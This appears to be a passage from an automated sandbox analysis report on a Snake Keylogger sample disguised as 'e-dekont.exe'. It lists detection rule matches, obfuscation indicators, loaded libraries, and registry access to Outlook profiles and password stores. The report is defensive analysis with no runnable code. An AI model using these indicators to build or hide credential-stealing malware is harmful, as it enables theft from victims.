            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: e-dekont.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, -C.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, -C.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, dTtXywlp86sra2ZdK5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, dTtXywlp86sra2ZdK5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, dTtXywlp86sra2ZdK5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, dTtXywlp86sra2ZdK5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, dTtXywlp86sra2ZdK5.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, dTtXywlp86sra2ZdK5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
            Source: C:\Users\user\Desktop\e-dekont.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e-dekont.exe.logJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMutant created: NULL
            Source: e-dekont.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: e-dekont.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\e-dekont.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003216000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003207000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: e-dekont.exeReversingLabs: Detection: 60%
            Source: e-dekont.exeVirustotal: Detection: 61%
            Source: C:\Users\user\Desktop\e-dekont.exeFile read: C:\Users\user\Desktop\e-dekont.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"
            Source: C:\Users\user\Desktop\e-dekont.exeProcess created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"
            Source: C:\Users\user\Desktop\e-dekont.exeProcess created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: e-dekont.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: e-dekont.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: e-dekont.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wGVE.pdbSHA256S source: e-dekont.exe
            Source: Binary string: wGVE.pdb source: e-dekont.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: e-dekont.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.cs.Net Code: DV8ePiLWbw System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.2b052b4.1.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.cs.Net Code: DV8ePiLWbw System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.73b0000.12.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.cs.Net Code: DV8ePiLWbw System.Reflection.Assembly.Load(byte[])
            Source: e-dekont.exeStatic PE information: 0xFFD1EFAD [Sun Jan 3 07:54:21 2106 UTC]
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_0295E460 pushfd ; retf 0_2_0295E461
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F4507 pushad ; retf 0_2_073F4508
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 0_2_073F44FD pushad ; retf 0_2_073F44FE
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_02DC9770 push esp; ret 2_2_02DC9771
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0359F push es; iretd 2_2_06C0367C
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C03621 push es; iretd 2_2_06C0367C
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C09045 push es; ret 2_2_06C0904C
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_06C0359F push es; iretd 2_2_06C0367C
            Source: e-dekont.exeStatic PE information: section name: .text entropy: 7.955212716673103
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, GFmq6jeWw2VPHLdjXQ.csHigh entropy of concatenated method names: 'PRL0M0SX9U', 'NuD0Ca4lgp', 'S3u0pLnMDB', 'hp20DsVE5H', 'hOB03rn42v', 'ffj04xGQTX', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, SBhr37Eba3HGHsc4GS.csHigh entropy of concatenated method names: 'FrsFiYwdUH', 'CgEFJFbBj6', 'v1G0TuhbKD', 'IFn0StgSqy', 'prAFZkVctd', 'gQbFxw7Btq', 'pkuFByijjg', 'rc3F3v6M8i', 'MvNFcZrPNx', 'zniF1Nn5Us'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, SokUCaY3uiJOKtiAys2.csHigh entropy of concatenated method names: 'eDWjUoqhn4', 'nFyjsbI1r5', 'HiojPcDeCw', 'eW2jEELp8N', 'gx5jtvIBvd', 'IxjjngxuBg', 'o0KjfiX5ye', 'RFijAgOQES', 'vRajq8Fcec', 'cOYjQf5x9T'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, YSg4KxWDvO5g0WLFjV.csHigh entropy of concatenated method names: 'cweYEQc6ed', 'HjDYnXUG6F', 'fMMYAaLRY6', 'AdFYqZUW1F', 'RN3Y2a2CwI', 'QjkYgWVBDN', 'PNvYF7Qi9l', 'TmfY08ys7p', 'wXtYjouk3Z', 'fE9Yr18YDF'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, K0BC4Ea55hp7C27VHS.csHigh entropy of concatenated method names: 'TQKNo1LuXs', 'kQtNUhxOUD', 'KI1NPFiESx', 'OyqNETO8S4', 'npmNn4TV2v', 'mYCNfHbjhD', 'Q7uNqoAhdw', 'SfrNQKxNU3', 'UrfqPBZeGWxXjrgcSRs', 'UQ5KDuZq40ZgwfJdeiB'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, gKGHQrtfF8pAIlCF7W.csHigh entropy of concatenated method names: 'ay4jSBJLtc', 'QehjbSroLC', 'lCAje9gyo9', 'DGYjKLWkry', 'K7sjWu06va', 'nD8j6wAQ9Y', 'OBljNvBXQk', 'GcG0H2dZd6', 'G1o0igXqop', 'RZf0aqYqL4'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, mg7ueT58ImXGqb211X.csHigh entropy of concatenated method names: 'N4IFONfuOj', 'D91FkosvTG', 'ToString', 'NDYFKb8j0E', 'gA0FWa4Sf0', 'HcjFYjbqZK', 'PmWF6MVbbI', 'uiQFNbM75v', 'xGwFh4tYNp', 'DoGFugXCgZ'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, LIgXRi1giEMrRmxvTU.csHigh entropy of concatenated method names: 'BAX2my8DYJ', 'PAu2xNOBiy', 'oHf23v0pYJ', 'G6V2ckQNRu', 'jtc2CcDpVO', 'z0N2pacRBT', 'dvQ2DmDIIE', 'c1124pxbyn', 'AGX29ygSkw', 'WEM2lE8isd'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, eNAIGeMhT6QTnJZQ2c.csHigh entropy of concatenated method names: 'S5bPtZHrU', 'Xu4E0Z48e', 'oPfnqwjRY', 'D9qfdNRD9', 'RyZqD81iX', 'x1CQbZpV3', 'cwDIZU5gTwhp5CqvsF', 'LwFq4PIDUU5RVsWInQ', 'FmO0Qc1iG', 'SXsr21pK9'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, CY9iQ9UQIfrGylb4q6.csHigh entropy of concatenated method names: 'vpWhK7orJA', 'dvrhY5ZOms', 'MebhN8rPCo', 'yt1NJsdvTr', 'qovNzBxmLh', 'GiKhTD63Sb', 'YkohSFYS9F', 'FHJhGlO2cB', 'towhb2BRAP', 'eEbheCq6ha'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, mleEQrRUKsxHalQgKV.csHigh entropy of concatenated method names: 'sR2hUjkjuY', 'CI7hswiGpZ', 'udihPInVh4', 'u1MhEAlS8C', 'RCchtH9qYP', 'YgGhnIoph7', 'G0Ghf5q8jx', 'pAAhAk5lSV', 'RZFhq2f2o4', 'fVchQpnF2G'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.csHigh entropy of concatenated method names: 'hXybwoSpjL', 'wwLbKT9WiK', 'A66bWtOqX8', 'Gi9bYQAxOl', 'YQJb61AoqN', 'RmNbNdJuAm', 'h6AbhK2Ief', 'kQHbuDpAmO', 'NnmbLym8SI', 'gh6bO74BP5'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, dTtXywlp86sra2ZdK5.csHigh entropy of concatenated method names: 'YfvW3Nv924', 'k5HWcdw4bv', 'UjCW1lP4XK', 'XX4WyG6Vc1', 'BLNW59pmUg', 'R5aWdX9baC', 'FNqWH3Yeyj', 'qTsWikWrAt', 'Ix9WaKtdJK', 'yVoWJxDpV8'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, vCntCIAQv8LQSynJxw.csHigh entropy of concatenated method names: 'b8tNwgwHEK', 'lKlNWSxC3u', 'aFsN6K63RU', 'I4gNhheH02', 'CONNuBxD25', 'sfI652WpJf', 'q6a6dcQdbc', 'NYA6HrqfEI', 'CG96i8YQBS', 'eRV6aL0xFc'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sIoks92u7sGwTcwfTc.csHigh entropy of concatenated method names: 'Dispose', 'PUwSaYWp5V', 'uy7GC2ZiSR', 'KU977WqTaB', 'gvQSJ5BSZb', 'ra0SzybWl7', 'ProcessDialogKey', 'Er8GTL9Oe5', 'lqtGSfZrZc', 'RkVGGBEoHK'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, o9fI1yvIhFCGn4Lj8I.csHigh entropy of concatenated method names: 'enFShZH9cB', 'ff0SuUUkHH', 'Ae2SOkAwoN', 'vQWSkKm5Ay', 'XfcS2KAMMc', 'nVeSg1ZQfL', 'iLaCOt7LcTlUfSLaac', 'Mhx1tcyPEOXdEtyN5n', 'AOPoATGyn5Dr9cLuQ5', 'pI3SSHISBU'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sbP0BMFZWXXPlLosyI.csHigh entropy of concatenated method names: 'DpLVAQa1xh', 'aiyVqdWXLN', 'qpQVMYLlQp', 'N39VCYn3OK', 'q3kVD4HA5h', 'DyeV4BscSc', 'Wn4VlZc1bS', 'kNHVvxfJfo', 'oNSVm6vDpK', 'fnvVZcAeYl'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, knCdjVGr83uL8hhtgn.csHigh entropy of concatenated method names: 'WXw0K1hMX7', 'alD0WekIPk', 'etV0YUMVTL', 'Thw06l0ppY', 'bSU0Nr1UdS', 'xNJ0h3Yk9G', 'rFu0uNj1WT', 'AUD0L9p0sn', 'jQX0OiuP6m', 'PVA0kfpP3C'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, EP2N8kZihyVdcM1idG.csHigh entropy of concatenated method names: 'YR5N1GnYKI', 'LxxNybEF8e', 'RNON5OPUi1', 'ToString', 'cIlNdolAZ6', 'RcKNH7G8bx', 'BywWSQZI3G7SFrmadrb', 'usOr7lZ9hQ2J7wMoraq', 'c8A6MhZU2edj2bXVebJ'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, iJAQ07YkZftAiMs5moQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yrnr3CSHWV', 'XnUrcHUgFo', 'OyVr17lhjB', 'AfUryghEWy', 'RaXr5Y9XA3', 'O1urds94Gx', 'YQjrHK7qmG'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sW8unUTVCmAe5wJ2kF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ax2GarCKHH', 'sMcGJpgUx7', 'AIWGzj3W4M', 'BYbbT69Si4', 'Dj5bS11gX1', 'ykhbGOpRYb', 'YsSbbh072T', 'P1f8RgOu7Vv5tcGXTlT'
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, KWjDk4zb0JGixMxZ7j.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a3TjVatgX3', 'f2oj2h02U9', 'zHTjgcjwR9', 'D6kjFPJYem', 'Vanj0B7qac', 'GQdjjYvP3s', 'HEyjrIHOVT'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, GFmq6jeWw2VPHLdjXQ.csHigh entropy of concatenated method names: 'PRL0M0SX9U', 'NuD0Ca4lgp', 'S3u0pLnMDB', 'hp20DsVE5H', 'hOB03rn42v', 'ffj04xGQTX', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, SBhr37Eba3HGHsc4GS.csHigh entropy of concatenated method names: 'FrsFiYwdUH', 'CgEFJFbBj6', 'v1G0TuhbKD', 'IFn0StgSqy', 'prAFZkVctd', 'gQbFxw7Btq', 'pkuFByijjg', 'rc3F3v6M8i', 'MvNFcZrPNx', 'zniF1Nn5Us'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, SokUCaY3uiJOKtiAys2.csHigh entropy of concatenated method names: 'eDWjUoqhn4', 'nFyjsbI1r5', 'HiojPcDeCw', 'eW2jEELp8N', 'gx5jtvIBvd', 'IxjjngxuBg', 'o0KjfiX5ye', 'RFijAgOQES', 'vRajq8Fcec', 'cOYjQf5x9T'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, YSg4KxWDvO5g0WLFjV.csHigh entropy of concatenated method names: 'cweYEQc6ed', 'HjDYnXUG6F', 'fMMYAaLRY6', 'AdFYqZUW1F', 'RN3Y2a2CwI', 'QjkYgWVBDN', 'PNvYF7Qi9l', 'TmfY08ys7p', 'wXtYjouk3Z', 'fE9Yr18YDF'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, K0BC4Ea55hp7C27VHS.csHigh entropy of concatenated method names: 'TQKNo1LuXs', 'kQtNUhxOUD', 'KI1NPFiESx', 'OyqNETO8S4', 'npmNn4TV2v', 'mYCNfHbjhD', 'Q7uNqoAhdw', 'SfrNQKxNU3', 'UrfqPBZeGWxXjrgcSRs', 'UQ5KDuZq40ZgwfJdeiB'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, gKGHQrtfF8pAIlCF7W.csHigh entropy of concatenated method names: 'ay4jSBJLtc', 'QehjbSroLC', 'lCAje9gyo9', 'DGYjKLWkry', 'K7sjWu06va', 'nD8j6wAQ9Y', 'OBljNvBXQk', 'GcG0H2dZd6', 'G1o0igXqop', 'RZf0aqYqL4'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, mg7ueT58ImXGqb211X.csHigh entropy of concatenated method names: 'N4IFONfuOj', 'D91FkosvTG', 'ToString', 'NDYFKb8j0E', 'gA0FWa4Sf0', 'HcjFYjbqZK', 'PmWF6MVbbI', 'uiQFNbM75v', 'xGwFh4tYNp', 'DoGFugXCgZ'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, LIgXRi1giEMrRmxvTU.csHigh entropy of concatenated method names: 'BAX2my8DYJ', 'PAu2xNOBiy', 'oHf23v0pYJ', 'G6V2ckQNRu', 'jtc2CcDpVO', 'z0N2pacRBT', 'dvQ2DmDIIE', 'c1124pxbyn', 'AGX29ygSkw', 'WEM2lE8isd'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, eNAIGeMhT6QTnJZQ2c.csHigh entropy of concatenated method names: 'S5bPtZHrU', 'Xu4E0Z48e', 'oPfnqwjRY', 'D9qfdNRD9', 'RyZqD81iX', 'x1CQbZpV3', 'cwDIZU5gTwhp5CqvsF', 'LwFq4PIDUU5RVsWInQ', 'FmO0Qc1iG', 'SXsr21pK9'
